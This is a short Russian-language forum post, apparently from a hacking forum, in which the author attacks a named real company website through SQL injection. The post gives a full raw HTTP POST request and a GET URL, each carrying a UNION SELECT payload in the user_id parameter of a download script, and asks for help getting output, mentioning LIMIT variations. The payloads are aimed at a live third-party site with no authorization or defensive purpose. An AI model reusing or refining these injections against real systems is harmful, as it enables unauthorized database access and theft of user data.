Есть иньекция, данные передаются постом
_____________________________________________
POST http://www.agilebio.com:80/products_labcal_download.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.agilebio.com
Content-Length: 84
Cookie: PHPSESSID=aeghec9708or5shhuv04kufu11
Connection: Close
Pragma: no-cache

user_id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16/*user_pass=&Submit=Download%21&action=download
_____________________________________________

Подобрал поля, но вывода не вижу, он тут есть?

З.Ы. А get тоже работает вроде

http://www.agilebio.com/products_labcal_download.php?user_id='+union+selec t+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*&user_pass=&Submit=Download%21&action=download

Наверное не могу поставить в id ошибочный параметр?
Пробовал с лимитом (+LIMIT+1,1/*) то же самое.